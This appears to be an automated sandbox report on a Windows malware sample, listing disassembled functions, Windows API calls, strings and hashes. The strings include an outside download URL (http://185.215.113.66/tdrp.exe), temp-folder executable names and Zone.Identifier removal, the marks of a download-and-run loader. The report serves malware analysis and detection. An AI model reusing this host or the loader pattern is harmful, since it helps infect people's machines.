                                                                                                                                                                                              • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                                                                              • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                                              • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                                                                              • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                                                                                                                              • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL ref: 0040FBF6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryQueryVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2850889275-0
                                                                                                                                                                                              • Opcode ID: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                                                                              • Instruction ID: 340d7b290d5355f760e33cf283827fd55aa9a8eadb82a746881808a00d0f8de8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                                                                              • Instruction Fuzzy Hash: CD61D6316046098FDB39CB29D49166A73A5FF85754F25813BDC06E7AD0E338EC4ACA4C
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HeapsProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1420622215-0
                                                                                                                                                                                              • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                                                                              • Instruction ID: 4a2b5bc9ffc7c309cb72e1a35e8a8f61e1833fedd8d517872c2a42ed84d10103
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD01DAF0904218CADB209B14D9887ADB774AB84304F1185EAD74977281C3781EDADF5E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                                                                              • Instruction ID: 161e6bb5934f27057a9722b698e232d6f14762762655f0a3ce64c62cefac505d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D127DB4D012199FCB48CF99D9919AEFBB2FF88304F24856AE415BB345D734AA01CF94
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                                                                              • Instruction ID: 80201675dd9b1cda4480dbd7700016e3944d41601b7f9a5a171a0727e2a58fe8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3821D872900204ABCB24EF69C8819A7B7A5FF44350B05807AED559B285D734F919CBE0

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                                                                              • srand.MSVCRT ref: 0040F570
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                                                                              • strlen.NTDLL ref: 0040F59A
                                                                                                                                                                                              • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F5B9
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F5CD
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7B5
                                                                                                                                                                                              • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7CC
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7E0
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F807
                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F844
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$.#v
                                                                                                                                                                                              • API String ID: 1632876846-885412783
                                                                                                                                                                                              • Opcode ID: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
                                                                                                                                                                                              • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                                                                              • srand.MSVCRT ref: 004064B0
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                                                                              • rand.MSVCRT ref: 004064D6
                                                                                                                                                                                              • rand.MSVCRT ref: 004064EA
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040650F
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                                                                              • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00406609
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • .#v, xrefs: 004065F2, 0040662D
                                                                                                                                                                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                                                                              • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                                                                              • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                                                                              • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                                                                              • %temp%, xrefs: 004064CB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe$.#v
                                                                                                                                                                                              • API String ID: 2816847299-151917633
                                                                                                                                                                                              • Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                              • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                                                                              • Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                              • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 558 40b850-40b867 call 40b780 561 40b869 558->561 562 40b86e-40b88a call 40b3d0 strcmp 558->562 563 40baf5-40baf8 561->563 566 40b891-40b8ad call 40b3d0 strstr 562->566 567 40b88c 562->567 570 40b8f0-40b90c call 40b3d0 strstr 566->570 571 40b8af-40b8cb call 40b3d0 strstr 566->571 567->563 578 40b90e-40b92a call 40b3d0 strstr 570->578 579 40b94f-40b96b call 40b3d0 strstr 570->579 576 40b8eb 571->576 577 40b8cd-40b8e9 call 40b3d0 strstr 571->577 576->563 577->570 577->576 588 40b94a 578->588 589 40b92c-40b948 call 40b3d0 strstr 578->589 586 40b96d-40b989 call 40b3d0 strstr 579->586 587 40b9ae-40b9c4 EnterCriticalSection 579->587 600 40b9a9 586->600 601 40b98b-40b9a7 call 40b3d0 strstr 586->601 592 40b9cf-40b9d8 587->592 588->563 589->579 589->588 593 40ba09-40ba14 call 40bb00 592->593 594 40b9da-40b9ea 592->594 607 40baea-40baef LeaveCriticalSection 593->607 608 40ba1a-40ba28 593->608 597 40ba07 594->597 598 40b9ec-40ba05 call 40df20 594->598 597->592 598->593 600->563 601->587 601->600 607->563 610 40ba2a 608->610 611 40ba2e-40ba3f call 40a740 608->611 610->611 611->607 614 40ba45-40ba62 call 40df20 611->614 617 40ba64-40ba74 614->617 618 40baba-40bad2 614->618 619 40ba80-40bab8 call 40ab60 617->619 620 40ba76-40ba7e Sleep 617->620 621 40bad8-40bae3 call 40bb00 618->621 619->621 620->617 621->607 626 40bae5 call 40b530 621->626 626->607
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                              • strcmp.NTDLL ref: 0040B880
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                              • API String ID: 2906596889-2213908610
                                                                                                                                                                                              • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                              • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 628 401920-401947 GetTickCount WaitForSingleObject 629 401ac9-401acf 628->629 630 40194d-401964 WSAWaitForMultipleEvents 628->630 631 4019f0-401a03 GetTickCount 630->631 632 40196a-401981 WSAEnumNetworkEvents 630->632 633 401a43-401a4c GetTickCount 631->633 634 401a05-401a14 EnterCriticalSection 631->634 632->631 635 401983-401988 632->635 639 401ab5-401ac3 WaitForSingleObject 633->639 640 401a4e-401a5d EnterCriticalSection 633->640 636 401a16-401a1d 634->636 637 401a3a-401a41 LeaveCriticalSection 634->637 635->631 638 40198a-401990 635->638 641 401a35 call 401820 636->641 642 401a1f-401a27 636->642 637->639 638->631 643 401992-4019b1 accept 638->643 639->629 639->630 644 401aa1-401ab1 LeaveCriticalSection GetTickCount 640->644 645 401a5f-401a77 InterlockedExchangeAdd call 40df20 640->645 641->637 642->636 646 401a29-401a30 LeaveCriticalSection 642->646 643->631 648 4019b3-4019c2 call 4022c0 643->648 644->639 653 401a97-401a9f 645->653 654 401a79-401a82 645->654 646->639 648->631 655 4019c4-4019df call 401740 648->655 653->644 653->645 654->653 656 401a84-401a8d call 40b4f0 654->656 655->631 661 4019e1-4019e7 655->661 656->653 661->631 662 4019e9-4019eb call 401cf0 661->662 662->631
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                              • String ID: PCOI$ilci
                                                                                                                                                                                              • API String ID: 3345448188-3762367603
                                                                                                                                                                                              • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                              • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040EF98
                                                                                                                                                                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                              • API String ID: 2761394606-2217117414
                                                                                                                                                                                              • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                              • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
